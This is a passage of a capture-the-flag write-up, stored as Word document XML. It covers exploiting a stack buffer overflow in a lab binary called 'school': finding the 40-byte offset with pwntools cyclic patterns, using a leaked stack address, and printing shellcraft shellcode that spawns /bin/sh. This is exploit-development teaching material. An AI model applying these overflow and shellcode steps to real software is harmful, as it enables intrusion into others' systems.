          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoo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7435" w14:paraId="2FF801AE" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191B5638" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B35F3B" wp14:editId="7D594C8C">
                  <wp:extent cx="1952625" cy="2514600"/>
                  <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                  <wp:docPr id="53664850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8502" name="Picture 3" descr="A screenshot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2514600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C76AE0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="255BE69F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AB3408" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DA8946" wp14:editId="0BD12A5C">
                  <wp:extent cx="1866900" cy="1476375"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                  <wp:docPr id="24759888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8882" name="Picture 4"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476375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w14:paraId="44E5F528" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="586543D4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Fig-Cap"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE81121" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Fig-Cap"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Imports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44FAD506" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435"/>
    <w:p w14:paraId="65CB2AAF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Too much input will cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00165BC7">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to crash with a segmentation error, which occurs when the </w:t>
      </w:r>
      <w:r w:rsidRPr="00165BC7">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method returns. When a method returns, it pops the top value off the stack before jumping to that address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E315DCE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="4346A44D" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="06E886B3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>[+] Starting local process './school': pid 1284615</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218432DB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Process './school' stopped with exit code -11 (SIGSEGV) (pid 1284615)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679FCD61" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:      amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7896E990" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RIP:       0x400681</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508B25A8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RSP:       0x7ffe9fe27878</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0530910D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Exe:       '/home/kali/Desktop/5-Week/school' (0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33394C3B" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00B9631D" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Fault:     </w:t>
            </w:r>
            <w:r w:rsidRPr="00B9631D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x6161616c6161616b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="382E493A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62BC0F15" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007fffffffddd8│+0x0000: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B9631D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>"kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]"    ← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639B90BD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde0│+0x0008: "maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaaya[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620C8304" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde8│+0x0010: "oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="150B20EC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66FAC9DC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; cyclic_find('kaaa') # Value stored at top of stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1EEBBE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0819F45E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fault and Stack Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C07E2E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Similarly to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B43BE0">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> challenge, the fault occurs when the input data exceeds 40 bytes and overwrites the return address. The data also leaks into the registers, overwriting </w:t>
      </w:r>
      <w:r w:rsidRPr="00B43BE0">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after 32 bytes of input.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="5EB3127F" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1952"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="01B5A838" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rax   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31032956" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00B43BE0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rbx   : 0x00007fffffffdee8  →  0x00007fffffffe250  →  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B43BE0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"/home/kali/Desktop/5-Week/school"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61559C8A" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00B43BE0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rsp   : 0x00007fffffffddd8  →  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B43BE0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6331E0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rbp   : 0x6161616a61616169 ("iaaajaaa"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747D2CBF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rsi   : 0x00007fffffffdc00  →  "Hi, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaala[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012A9B71" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A9A01DC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; cyclic_find('iaaa') # Value stored in RBP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61463D85" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16D983A8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C7EA0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>As shown in the main method code, the leaked address is a pointer to the input data. The address is the location of the beginning of the input data in the stack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="114188A6" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1952"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5BB29B9C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E08A78E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ pwn cyclic 100 &gt; inp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D10E467" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1719F5" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ gdb ./school -q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4BC457" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>gef</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>➤</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  r &lt; inp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB80CA7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Let's go to school! School's at: 0x7fffffffddb0. gimme directions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CA54B6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E208F46" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>gef</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>➤</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  x 0x7fffffffddb0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2225635F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>0x7fffffffddb0: 0x61616161</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F61FF6B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D905F6C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A98ADF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000400681 in main ()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A23F08B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Address Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFCCB9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435"/>
    <w:p w14:paraId="11EDD94F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The leaked address is a part of the executable stack memory. If an attacker can use a stack overflow to force school to jump to that address when its main method returns, the program will execute any code stored there. To perform the exploit, an attacker must build a payload comprised of 40 bytes or less of shellcode, padding (if necessary), and the leaked address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6682A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC70380" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The most straightforward approach is to build shellcode 40 bytes or less in size, but there are other ways to deal with stack buffer size restrictions. This solution uses a piece of shellcode 23 bytes in length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE233C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">In many cases, tools such as </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellcraft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> make it easy to generate shellcode for different purposes. However, most pieces of </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellcraft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code are longer than the 40-byte school buffer.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="17EA73AF" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="09FA978E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; print(asm(shellcraft.sh()))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D94E57F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04351AD9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; print(len(asm(shellcraft.sh())))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0453A4EB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1864CFC7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Shellcode Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83B88B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">These pieces of code can provide a good starting point for building more specific shellcode. The following example uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellcraft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell for </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>AMD64 Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which calls </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B8FA0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The code begins by pushing a single </w:t>
      </w:r>
      <w:r w:rsidRPr="000A44DA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'h,'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by </w:t>
      </w:r>
      <w:r w:rsidRPr="000A44DA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'/bin///s</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4135"/>
      </w:tblGrid>
